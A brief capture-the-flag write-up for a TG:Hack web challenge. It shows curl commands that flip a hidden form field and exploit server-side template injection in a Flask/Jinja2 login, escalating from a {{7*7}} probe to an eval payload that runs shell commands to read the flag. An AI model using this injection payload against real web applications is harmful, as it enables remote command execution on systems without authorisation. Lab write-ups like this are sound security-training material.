Rating: 3.0
```
curl 'https://wizardschat.tghack.no/login' --data 'has_magic=1&username={{7*7}}' --compressed -c cookie;curl https://wizardschat.tghack.no/ -b cookie
```
see username...
```
curl 'https://wizardschat.tghack.no/login' --data 'has_magic=1&username={{url_for.__globals__%5B%27__builtins__%27%5D%5B%27eval%27%5D%28%22__import__%28%27os%27%29.popen%28%27cat flag.txt%27%29.read%28%29%22%29}}' --compressed -c cookie;curl https://wizardschat.tghack.no/ -b cookie
```
see flag
when we browser https://wizardschat.tghack.no/login.we find `<input type="hidden" name="has_magic" value="0" />`
if we post has_magic=1&username=anything.. then we will get a cookie and new page. the username in response. test SSTI. use {{7*7}}. then username will be 49.
final payload .`url_for.__globals__['__builtins__']['eval']("__import__('os').popen('ls').read()")`
python3
```
from flask import *
url_for.__globals__
```
You can see the results yourself.
.......I read korean bro writeup then write this ........hahah
nice job ?
nice job XD
